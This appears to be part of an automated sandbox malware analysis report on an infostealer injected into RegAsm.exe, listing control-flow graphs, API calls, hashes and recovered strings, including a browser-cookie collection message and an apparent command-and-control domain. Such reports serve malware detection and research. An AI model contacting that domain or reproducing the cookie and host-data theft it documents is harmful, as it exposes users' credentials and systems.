              • API ID: EnvironmentExpandStrings
              • String ID: FV$ME$RU$_Y$nm${e$us$}{
              • API String ID: 237503144-3137052455
              • Opcode ID: ba73425cf05a851d930368bccd84be2363191e16674f02d9c6d3114ac7e3e1f6
              • Instruction ID: e5321231cfcc27ac2a2f222ef30045f45cb7c0dfcbf3e2ce2c8c20d1119ded8a
              • Opcode Fuzzy Hash: ba73425cf05a851d930368bccd84be2363191e16674f02d9c6d3114ac7e3e1f6
              • Instruction Fuzzy Hash: C02274B55083819BE324CF14C890B9BBBF1FFC5748F044A2DE4999B391D7789946CB8A

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 445 40a2d0-40a2e3 446 40a2e5-40a2f1 445->446 447 40a337-40a339 445->447 448 40a2f3-40a2f5 446->448 449 40a33e-40a34b 446->449 450 40a96c-40a975 447->450 451 40a2f7-40a335 448->451 452 40a34d-40a354 448->452 453 40a398-40a404 call 407140 call 4327d0 call 409210 449->453 455 40a356-40a36b 451->455 452->455 456 40a36d-40a393 452->456 462 40a450-40a493 call 409ba0 453->462 463 40a406 453->463 455->453 456->453 467 40a4e0-40a521 call 409ba0 462->467 468 40a495 462->468 464 40a410-40a44e 463->464 464->462 464->464 472 40a523 467->472 473 40a565-40a5aa call 409ba0 467->473 469 40a4a0-40a4de 468->469 469->467 469->469 474 40a530-40a563 472->474 477 40a5eb-40a612 473->477 478 40a5ac-40a5af 473->478 474->473 474->474 480 40a614 477->480 481 40a65d-40a696 call 409ba0 477->481 479 40a5b0-40a5e9 478->479 479->477 479->479 482 40a620-40a65b 480->482 485 40a698 481->485 486 40a6dd-40a84c call 409e80 481->486 482->481 482->482 488 40a6a0-40a6db 485->488 490 40a84e-40a84f 486->490 491 40a89f-40a8e2 486->491 488->486 488->488 492 40a850-40a89d 490->492 493 40a8e4 491->493 494 40a937-40a957 call 40e440 call 409220 491->494 492->491 492->492 495 40a8f0-40a935 493->495 499 40a95c-40a965 494->499 495->494 495->495 499->450
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: 0$0&37$69$=5>7$=R$@Y$CPKT$S@MN$XC$~q
              • API String ID: 0-2055083758
              • Opcode ID: 880f53d964a0e9b77d48151257eb1767705a4f868f0182372404917249e2104e
              • Instruction ID: c0b7e7c8f5880602c8b8cdfddcf139e3189c80a8d3d946fe78c416ac3d7f1821
              • Opcode Fuzzy Hash: 880f53d964a0e9b77d48151257eb1767705a4f868f0182372404917249e2104e
              • Instruction Fuzzy Hash: 860223B0608381ABD314CF25C590A6BBBE1EBC6708F54992DE4D98B292D778D809CB57

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
              • String ID:
              • API String ID: 1449868515-3916222277
              • Opcode ID: e3b04fcf15636bf7ce31bab26468f43836797ede7990c5f67908893d17af2b7f
              • Instruction ID: 70b95899116a8ec3f0e5a775bddb827291e062b5e2f7b14d136dc80721b6dd08
              • Opcode Fuzzy Hash: e3b04fcf15636bf7ce31bab26468f43836797ede7990c5f67908893d17af2b7f
              • Instruction Fuzzy Hash: 48914CB4605B008FC364EF2CD981A16BBF1FB49700B10896DE89AC7760D731B845CF96

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 519 416ede-416f1d 520 416f56-416fba call 415380 519->520 521 416f1f 519->521 525 416ff9-41707b call 415380 520->525 526 416fbc-416fbf 520->526 522 416f20-416f54 521->522 522->520 522->522 530 4170c3-41711b call 415380 525->530 531 41707d-41707f 525->531 527 416fc0-416ff7 526->527 527->525 527->527 535 41711d-41711f 530->535 536 41715c-4171cf call 415380 530->536 532 417080-4170c1 531->532 532->530 532->532 537 417120-41715a 535->537 540 4171d1 536->540 541 417219-41723e 536->541 537->536 537->537 542 4171e0-417217 540->542 543 417240-41724a 541->543 542->541 542->542 543->543 544 41724c-41725b 543->544 545 417264 544->545 546 41725d-417262 544->546 547 417267-41727e call 409210 545->547 546->547 550 417280-417286 547->550 551 4172a3 547->551 552 417290-41729f 550->552 553 4172a6-4172b7 551->553 552->552 554 4172a1 552->554 555 4172d1-4172ed 553->555 556 4172b9-4172bf 553->556 554->553 558 417309-417322 call 432ae0 call 415380 555->558 557 4172c0-4172cf 556->557 557->555 557->557 562 417327-417334 558->562 563 4172f0-4172fd 562->563 564 417352-417368 562->564 565 417304-417306 562->565 566 4174a6-4174b6 call 409220 562->566 567 417379 562->567 568 41733b-417344 562->568 569 41734b 562->569 570 4174bd-417530 562->570 571 41736f-417372 562->571 572 41737e-41740a 562->572 563->564 563->565 563->566 563->567 563->569 563->570 563->571 563->572 564->566 564->567 564->570 564->571 565->558 566->567 566->570 567->572 568->564 568->565 568->566 568->567 568->569 568->570 568->571 568->572 569->564 574 417532 570->574 575 417597-4175c1 570->575 571->567 571->570 576 417447-41744f 572->576 577 41740c-41740f 572->577 579 417540-417595 574->579 580 4175d0-4175da 575->580 582 417450-417456 576->582 581 417410-417445 577->581 579->575 579->579 580->580 583 4175dc-4175ee 580->583 581->576 581->581 582->582 584 417458-417460 582->584 585 4175f0-4175f5 583->585 586 4175f7 583->586 587 417462-41746f 584->587 588 417486-41749f 584->588 590 4175fa-41760e call 409210 585->590 586->590 589 417470-41747b 587->589 588->566 588->567 588->570 588->571 589->589 591 41747d-417483 589->591 594 417610-417616 590->594 595 417633 590->595 591->588 596 417620-41762f 594->596 597 417636-417644 595->597 596->596 598 417631 596->598 599 417661-41769f 597->599 600 417646-417649 597->600 598->597 602 4176a1 599->602 603 417704-41772f 599->603 601 417650-41765f 600->601 601->599 601->601 604 4176b0-417702 602->604 605 417730-41773a 603->605 604->603 604->604 605->605 606 41773c-41774e 605->606 607 417750-41775a 606->607 607->607 608 41775c-417774 607->608 609 417776-41777b 608->609 610 41777d-417781 608->610 611 417784-41779a call 409210 609->611 610->611 614 4177b1-4177c2 611->614 615 41779c-41779f 611->615 617 4177e3 614->617 618 4177c4-4177ca 614->618 616 4177a0-4177af 615->616 616->614 616->616 620 4177e6-4177f4 617->620 619 4177d0-4177df 618->619 619->619 621 4177e1 619->621 622 417813 620->622 623 4177f6-4177ff 620->623 621->620 624 417816-417839 622->624 625 417800-41780f 623->625 626 41783b 624->626 627 41787a-4178ab call 41a3c0 624->627 625->625 628 417811 625->628 629 417840-417878 626->629 632 4178b2-4178c2 call 409220 627->632 633 4178d9-4178ef call 409220 627->633 634 4178c9 627->634 635 4178cb-4178d2 627->635 628->624 629->627 629->629 632->633 632->634 634->635 635->633 635->634
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: S=W?$Vgu|$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$e$P^$f%G'$g`[n$EC
              • API String ID: 0-3351576115
              • Opcode ID: d5e4c7c7c03b51a8277f3b8b55d732c47095251f19c33ca41ed3d61ebcbdeba3
              • Instruction ID: aa73c099e0453a0996e054fb6c7b2a0b7f872896936e05adce8e12da1c19aedf
              • Opcode Fuzzy Hash: d5e4c7c7c03b51a8277f3b8b55d732c47095251f19c33ca41ed3d61ebcbdeba3
              • Instruction Fuzzy Hash: C162BEB5604B018FD728CF29C591A53BBF2FF46304B1889ADD49A8BB56D738F841CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 640 425e08-425e80 call 4381c0 644 425e82 640->644 645 425ef6-425eff 640->645 648 425e90-425ef4 644->648 646 425f01-425f07 645->646 647 425f1b-425f27 645->647 649 425f10-425f19 646->649 650 425f3b-425fc7 FreeLibrary call 4381c0 GetComputerNameExA 647->650 651 425f29-425f2f 647->651 648->645 648->648 649->647 649->649 656 426037-426040 650->656 657 425fc9 650->657 652 425f30-425f39 651->652 652->650 652->652 659 426042-42604e 656->659 660 42605d-426063 656->660 658 425fd0-426035 657->658 658->656 658->658 662 426050-426059 659->662 661 426065-426071 660->661 663 426073-426079 661->663 664 42608b-426102 GetComputerNameExA 661->664 662->662 665 42605b 662->665 666 426080-426089 663->666 667 426164-42616d 664->667 668 426104 664->668 665->661 666->664 666->666 670 42618b-426197 667->670 671 42616f-426175 667->671 669 426110-426162 668->669 669->667 669->669 673 4261ab-42621d 670->673 674 426199-42619f 670->674 672 426180-426189 671->672 672->670 672->672 677 426271-42627a 673->677 678 42621f 673->678 675 4261a0-4261a9 674->675 675->673 675->675 680 42629b-4262a7 677->680 681 42627c-426282 677->681 679 426220-42626f 678->679 679->677 679->679 683 4262bb-42633a call 4381c0 680->683 684 4262a9-4262af 680->684 682 426290-426299 681->682 682->680 682->682 689 4263a7-4263b0 683->689 690 42633c-42633f 683->690 685 4262b0-4262b9 684->685 685->683 685->685 691 4263b2-4263bf 689->691 692 4263cd 689->692 693 426340-4263a5 690->693 694 4263c0-4263c9 691->694 695 4263d3-4263de 692->695 693->689 693->693 694->694 696 4263cb 694->696 697 4263f8-426404 695->697 696->695 698 42640a-426410 697->698 699 42648f-4264e4 697->699 702 426412-426422 698->702 703 4263e0-4263e2 698->703 700 4264e6 699->700 701 426544-42654d 699->701 704 4264f0-426542 700->704 705 42656b-42656e call 42c1d0 701->705 706 42654f-426555 701->706 708 426450-426458 702->708 709 426424-426429 702->709 707 4263e7-4263f2 703->707 704->701 704->704 715 426573-42658f 705->715 710 426560-426569 706->710 707->697 712 42648b-42648d 707->712 708->707 714 42645a-426486 708->714 709->707 713 42642b-426445 709->713 710->705 710->710 712->699 713->707 714->707
              APIs
              • FreeLibrary.KERNEL32(?), ref: 00425F44
              • GetComputerNameExA.KERNEL32(00000006,00000000,00000200), ref: 00425F80
              • GetComputerNameExA.KERNEL32(00000005,?,00000200), ref: 004260A9
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: ComputerName$FreeLibrary
              • String ID: hFt9$}pwA
              • API String ID: 2243422189-1297242567
              • Opcode ID: bd9181195a1a91599c2f1bfd620b85cbca767a1576a5e5c4a617e607daf9e284
              • Instruction ID: 4c86706fbfa3d4aab4fd8d2a45a0279c4dc4b826246f715bae81ac0f7aff6e86
              • Opcode Fuzzy Hash: bd9181195a1a91599c2f1bfd620b85cbca767a1576a5e5c4a617e607daf9e284
              • Instruction Fuzzy Hash: F5F16D70204F928ED725CF38C8A0BE7BBE1AF56309F54486DD4EB87282DB396549CB54

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 738 425e02-425f55 call 4381c0 741 425f5a-425fc7 GetComputerNameExA 738->741 742 426037-426040 741->742 743 425fc9 741->743 745 426042-42604e 742->745 746 42605d-426063 742->746 744 425fd0-426035 743->744 744->742 744->744 748 426050-426059 745->748 747 426065-426071 746->747 749 426073-426079 747->749 750 42608b-426102 GetComputerNameExA 747->750 748->748 751 42605b 748->751 752 426080-426089 749->752 753 426164-42616d 750->753 754 426104 750->754 751->747 752->750 752->752 756 42618b-426197 753->756 757 42616f-426175 753->757 755 426110-426162 754->755 755->753 755->755 759 4261ab-42621d 756->759 760 426199-42619f 756->760 758 426180-426189 757->758 758->756 758->758 763 426271-42627a 759->763 764 42621f 759->764 761 4261a0-4261a9 760->761 761->759 761->761 766 42629b-4262a7 763->766 767 42627c-426282 763->767 765 426220-42626f 764->765 765->763 765->765 769 4262bb-42633a call 4381c0 766->769 770 4262a9-4262af 766->770 768 426290-426299 767->768 768->766 768->768 775 4263a7-4263b0 769->775 776 42633c-42633f 769->776 771 4262b0-4262b9 770->771 771->769 771->771 777 4263b2-4263bf 775->777 778 4263cd 775->778 779 426340-4263a5 776->779 780 4263c0-4263c9 777->780 781 4263d3-4263de 778->781 779->775 779->779 780->780 782 4263cb 780->782 783 4263f8-426404 781->783 782->781 784 42640a-426410 783->784 785 42648f-4264e4 783->785 788 426412-426422 784->788 789 4263e0-4263e2 784->789 786 4264e6 785->786 787 426544-42654d 785->787 790 4264f0-426542 786->790 791 42656b-42656e call 42c1d0 787->791 792 42654f-426555 787->792 794 426450-426458 788->794 795 426424-426429 788->795 793 4263e7-4263f2 789->793 790->787 790->790 801 426573-42658f 791->801 796 426560-426569 792->796 793->783 798 42648b-42648d 793->798 794->793 800 42645a-426486 794->800 795->793 799 42642b-426445 795->799 796->791 796->796 798->785 799->793 800->793
              APIs
              • GetComputerNameExA.KERNEL32(00000006,00000000,00000200), ref: 00425F80
              • GetComputerNameExA.KERNEL32(00000005,?,00000200), ref: 004260A9
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: ComputerName
              • String ID: D:" $hFt9
              • API String ID: 3545744682-2221324083
              • Opcode ID: 4191f4dd82ef557f709a3915640da7d1852281fdad0fc783e1b06556bd1ab865
              • Instruction ID: 44cfb1a33ae79f4e17d400ba145ff8994c20aaafb6fb321894f6b9926c90411a
              • Opcode Fuzzy Hash: 4191f4dd82ef557f709a3915640da7d1852281fdad0fc783e1b06556bd1ab865
              • Instruction Fuzzy Hash: 4DF18F70204B928ED725CF38C890BEBBBE1AF16309F54486DD4EB87282DB397549CB55
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: RI$SN$\S$}A
              • API String ID: 0-3367954465
              • Opcode ID: 548ca3509e934277eb8f9b388b5dd605ca6b1f883a63599413b390ea9f89b11f
              • Instruction ID: c095f753aaf1491264e7a1d9a384aeae9fe72364fc8be97e91d415fc448828d3
              • Opcode Fuzzy Hash: 548ca3509e934277eb8f9b388b5dd605ca6b1f883a63599413b390ea9f89b11f
              • Instruction Fuzzy Hash: 78D1AF716183118BC718DF14C8A16ABB7F2FFC5354F484A1DE8D28B390E7B8A945CB96
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: pr6$pr6
              • API String ID: 2994545307-558223686
              • Opcode ID: 3c08260f363a62de69ae81dfeb72ffb81a28d5d2549b1224bb8bbe5b536a817c
              • Instruction ID: 7bc992873b883e6864d4509e3bec871203124b72d69158d1f4a2f6dc8cacbe6c
              • Opcode Fuzzy Hash: 3c08260f363a62de69ae81dfeb72ffb81a28d5d2549b1224bb8bbe5b536a817c
              • Instruction Fuzzy Hash: A381D0716083019BD718CF18C891B6BB7E2EF89718F14892DE8D987391D739EC15CB96
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf0c1606309cb73cfab1debe393841734946cd72e0836dd356f9ba08ee0dcdfb
              • Instruction ID: 9eedd6468a65b649b8edcff54e47c7a4dd1f7f1a9707ed3865f8e6dd5a660395
              • Opcode Fuzzy Hash: cf0c1606309cb73cfab1debe393841734946cd72e0836dd356f9ba08ee0dcdfb
              • Instruction Fuzzy Hash: C7518DB19083818FC714CF68C48169BFBE1ABD5304F158A6EF4E987382E779D949CB46
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: RVA
              • API String ID: 0-2101585944
              • Opcode ID: 7e91ab1ec2b5d8a4fe3b9104ccd3a6225cc7943e5d2a6ae97ebbc222dbdfeb30
              • Instruction ID: 04e13a62698548ec8aa581bf207fa16684f241504b6856fd404bbb55690f86c0
              • Opcode Fuzzy Hash: 7e91ab1ec2b5d8a4fe3b9104ccd3a6225cc7943e5d2a6ae97ebbc222dbdfeb30
              • Instruction Fuzzy Hash: 2DC19DB5500B01DFD724CF18C891AA3B3B2FF9A314B14496EE4968B7A2E734F851CB95
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: uw
              • API String ID: 0-2711446736
              • Opcode ID: cda7a0a0778dc88e725b3541c21633047639bbc5af099bce3841335e19b9afb8
              • Instruction ID: deab8babf5b008c9bcaa080d93073eb87a74027d427fae1c7023be5d0618b12a
              • Opcode Fuzzy Hash: cda7a0a0778dc88e725b3541c21633047639bbc5af099bce3841335e19b9afb8
              • Instruction Fuzzy Hash: 179177B15083409BC714CF14D891BABBBF1FF85358F148A2DE4DA4B391E3789946CB9A
              APIs
              • LdrInitializeThunk.NTDLL(00438EDC,005C003F,00000006,00120089,?,00000018,00000E0F,00000000,004159BE), ref: 004362D6
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
              • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
              • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
              • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10aecd6c96b7afcce66defdd74d5bec954f1197f029120d4b7891c1afaec4b64
              • Instruction ID: f30a6acde0602535893f0a0962490bbf3739aa5128b8dffafda5a0dd66eafadc
              • Opcode Fuzzy Hash: 10aecd6c96b7afcce66defdd74d5bec954f1197f029120d4b7891c1afaec4b64
              • Instruction Fuzzy Hash: D481FF726083029BD714DF18C880B6BB7E2EF89704F158A2DE9C84B361D775AC55CB9A
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 837aff3c098628bf8885ecf50199b30f6da831132a68828896c6ff076b5a75e4
              • Instruction ID: c8bfd4c90271bfe15baf9663d0e6c64edb4d6f026fe331d7a11810d8c1bfdd95
              • Opcode Fuzzy Hash: 837aff3c098628bf8885ecf50199b30f6da831132a68828896c6ff076b5a75e4
              • Instruction Fuzzy Hash: 28418070204B928BD335CF25D4A0BABBBE2EF42304F58496DD4E78B685DB34B449CB58
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a3ade37528489ec1b5cd098bcef7a2e3af3bc1494b1089e366a910d10fa89f0d
              • Instruction ID: edb38dd12e0d116c8adeb34d0aafaa117275c92812055702f8669df78c1012f8
              • Opcode Fuzzy Hash: a3ade37528489ec1b5cd098bcef7a2e3af3bc1494b1089e366a910d10fa89f0d
              • Instruction Fuzzy Hash: 7B31D3746483849BE330CF44DC85BDBB7E4EB86304F50892DE2A89B291DA749495CB5B
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee47f365db0ce5bdbad0a887e0683c682a85e5bea277e3a56b3af482356e96ed
              • Instruction ID: 5b6166f083a9fc5464781a5678557a7bf4150444a5cffe08fbcfb445bd5c6996
              • Opcode Fuzzy Hash: ee47f365db0ce5bdbad0a887e0683c682a85e5bea277e3a56b3af482356e96ed
              • Instruction Fuzzy Hash: 86F015B45043018FC314DF28D49475ABBE0BB8C304F01881DE89A8B750C7B4AA44CF91

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 802 4157b0-4157c4 803 4157d0-4157d8 802->803 803->803 804 4157da-415806 RtlExpandEnvironmentStrings 803->804 805 415808-41580d 804->805 806 41580f 804->806 807 415812-415895 call 409210 RtlExpandEnvironmentStrings 805->807 806->807 810 415904-415931 807->810 811 415897 807->811 813 415933-415938 810->813 814 41593a-41593c 810->814 812 4158a0-415902 811->812 812->810 812->812 815 41593f-415950 call 409210 813->815 814->815 818 415971-415981 815->818 819 415952-415957 815->819 821 4159a1-4159c6 call 438d00 818->821 822 415983-41598a 818->822 820 415960-41596f 819->820 820->818 820->820 826 415a17 821->826 827 415a26-415a59 821->827 828 415afa 821->828 829 4159cd-4159e5 call 4390e0 821->829 830 4159ec-415a03 call 409210 call 439200 821->830 823 415990-41599f 822->823 823->821 823->823 826->827 831 415a5b 827->831 832 415aae-415ab6 827->832 828->828 829->826 829->827 829->830 841 415a08-415a10 830->841 835 415a60-415aac 831->835 832->828 836 415ab8-415ac4 832->836 835->832 835->835 840 415ad0-415ad7 836->840 842 415ae0-415ae6 840->842 843 415ad9-415adc 840->843 841->826 841->827 841->828 841->829 841->830 842->828 844 415ae8-415af7 call 4362b0 842->844 843->840 845 415ade 843->845 844->828 845->828
              APIs
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004157FA
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00415826
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: EnvironmentExpandStrings
              • String ID: H[$M]
              • API String ID: 237503144-1708362031
              • Opcode ID: b1ff25e1da103a7cc77c132b60fbd10cdeee2f7b4715ac39776106f613229bb5
              • Instruction ID: 7c4147fb78348db80e2d8b800c4f060a89954139a1f0407642eedb840d8e1fb6
              • Opcode Fuzzy Hash: b1ff25e1da103a7cc77c132b60fbd10cdeee2f7b4715ac39776106f613229bb5
              • Instruction Fuzzy Hash: 1F81F175508311DBD324CF14C890BABB7E5EFC5314F144A2DF89A9B291DB789885CB8A
              APIs
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417E68
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417E9A
              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417F55
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: EnvironmentExpandStrings
              • String ID:
              • API String ID: 237503144-0
              • Opcode ID: 083996b5030d263de3a33a935d2a53ad15f3cdc5364144f20a829a0d2e87ae28
              • Instruction ID: 29ea2031aae92dc22cfdc589cc98f995da773fc27401c5d9bfc9e7d21e6a3e6c
              • Opcode Fuzzy Hash: 083996b5030d263de3a33a935d2a53ad15f3cdc5364144f20a829a0d2e87ae28
              • Instruction Fuzzy Hash: 90417AB6600700AFD7208F69CC46B537BF9EB49324F114A2DF55AC76A1E634F8448BA6
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: AllocString
              • String ID: !$#
              • API String ID: 2525500382-2504090897
              • Opcode ID: f91d4734ce6a823b3e7273150ecff3f9583bb2640da2874246817b65e9cac9b9
              • Instruction ID: cea932b29600be834b8cf3035c043c2c4d3e3157c6bee8df6389bd001cf99316
              • Opcode Fuzzy Hash: f91d4734ce6a823b3e7273150ecff3f9583bb2640da2874246817b65e9cac9b9
              • Instruction Fuzzy Hash: 1141077054C7C28ED331CB28C4487ABBBE1AF9A314F148A6DE4E84B392D3B58545DB97
              APIs
              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00432904
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: InformationVolume
              • String ID: C$\
              • API String ID: 2039140958-514332402
              • Opcode ID: 783394234f08044f60cf7a8925407cb8c2b926fd03062113e3885e86c3c64365
              • Instruction ID: 16e6a8a04b1d81b048d1d43d0af2da77152079f5452997c4a3dead92d532e1bf
              • Opcode Fuzzy Hash: 783394234f08044f60cf7a8925407cb8c2b926fd03062113e3885e86c3c64365
              • Instruction Fuzzy Hash: 53F09B75285302AFE714CF10EC56F1A76549751704F20482C7241E71D1C7B469098F9D
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID: backcreammykiel.shop
              • API String ID: 1029625771-2601513811
              • Opcode ID: 541059713f4c2d59a0f29a49323a58a14de1114b42b63a240ae1e76cc70ba6a1
              • Instruction ID: b1674590f23a76534918493d0a88a11708ce5f108b38a3496a18a2421ac25250
              • Opcode Fuzzy Hash: 541059713f4c2d59a0f29a49323a58a14de1114b42b63a240ae1e76cc70ba6a1
              • Instruction Fuzzy Hash: 86E19FB4504B00CFC710DF28D98161ABFF1EF56314F048A6ED49A9B7A2E735A845CB9B
              APIs
              Strings
              • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 004098A4
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: ExitProcess
              • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
              • API String ID: 621844428-780655312
              • Opcode ID: 89526c1aab6bb489d942a3af36ec83d1bc70f4389796c9a029ec851a76cab7ee
              • Instruction ID: 349ce8a2ab2fb153aeb3778cfd874f600bc1146e3b5cc3017fdf34bd3933f38e
              • Opcode Fuzzy Hash: 89526c1aab6bb489d942a3af36ec83d1bc70f4389796c9a029ec851a76cab7ee
              • Instruction Fuzzy Hash: 4FF05EB283C61496D90477B696062AE7754AF13349F10D43FE841323C3EA7D4C5A62AF
              APIs
              • RtlFreeHeap.NTDLL(?,00000000), ref: 00434668
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID: FreeHeap
              • String ID: VSE
              • API String ID: 3298025750-5255320
              • Opcode ID: 8b55094167372aa92f060f3541943351f3700fbb09e13d3c799550166db44aa2
              • Instruction ID: 3a6f44b314ccdeb050b69574afb66bec7e53ff6f18aad6f3880598c701dc8768
              • Opcode Fuzzy Hash: 8b55094167372aa92f060f3541943351f3700fbb09e13d3c799550166db44aa2
